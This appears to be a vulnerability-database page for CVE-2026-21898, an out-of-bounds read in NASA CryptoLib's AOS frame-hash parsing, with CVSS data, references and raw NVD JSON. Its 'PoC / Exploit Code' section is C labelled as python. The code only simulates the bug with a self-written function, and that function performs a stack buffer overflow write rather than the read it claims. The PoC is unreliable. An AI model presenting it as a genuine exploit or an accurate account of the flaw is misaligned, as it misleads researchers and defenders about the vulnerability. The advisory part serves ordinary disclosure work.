CVE-2026-21898

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_AOS_ProcessSecurity function reads memory without valid bounds checking when parsing AOS frame hashes. This issue has been patched in version 1.4.3.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE

CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-21898 PoC - Malformed AOS Frame Hash
// This PoC demonstrates the out-of-bounds read in Crypto_AOS_ProcessSecurity
// Target: NASA CryptoLib < 1.4.3

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simulated AOS Frame Structure
typedef struct {
    unsigned char frame_header[16];
    unsigned short hash_length;
    unsigned char* hash_data;
    unsigned char payload[256];
} AOS_Frame;

// Vulnerable function (simplified simulation)
void Crypto_AOS_ProcessSecurity(AOS_Frame* frame) {
    // VULNERABLE: No bounds checking on hash_length
    unsigned char hash_buffer[64];
    
    // Out-of-bounds read when hash_length > 64
    for (int i = 0; i < frame->hash_length; i++) {
        hash_buffer[i] = frame->hash_data[i];
    }
}

// Craft malicious frame to trigger vulnerability
AOS_Frame* craft_malicious_frame() {
    AOS_Frame* frame = malloc(sizeof(AOS_Frame));
    
    // Set hash_length larger than buffer (64 bytes)
    frame->hash_length = 256;  // Exceeds hash_buffer size
    frame->hash_data = malloc(256);
    memset(frame->hash_data, 0x41, 256);
    
    return frame;
}

int main() {
    printf("[*] CVE-2026-21898 PoC\n");
    printf("[*] Target: NASA CryptoLib < 1.4.3\n");
    printf("[*] Vulnerability: OOB Read in Crypto_AOS_ProcessSecurity\n\n");
    
    AOS_Frame* malicious_frame = craft_malicious_frame();
    
    printf("[*] Crafting malicious AOS frame...\n");
    printf("[*] Hash length: %d bytes (buffer size: 64 bytes)\n", 
           malicious_frame->hash_length);
    
    printf("[*] Triggering vulnerable function...\n");
    Crypto_AOS_ProcessSecurity(malicious_frame);
    
    printf("[!] Out-of-bounds memory read occurred!\n");
    printf("[!] Potential information disclosure or crash\n");
    
    free(malicious_frame->hash_data);
    free(malicious_frame);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21898
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21898
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21898/
[4] VulDB https://vuldb.com/cve/CVE-2026-21898
[5] https://github.com/nasa/CryptoLib/releases/tag/v1.4.3
[6] https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853
[7] https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21898", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:17.957", "lastModified": "2026-01-15T21:48:49.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_AOS_ProcessSecurity function reads memory without valid bounds checking when parsing AOS frame hashes. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial que ejecuta el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, la función Crypto_AOS_ProcessSecurity lee memoria sin una comprobación de límites válida al analizar los hashes de tramas AOS. Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}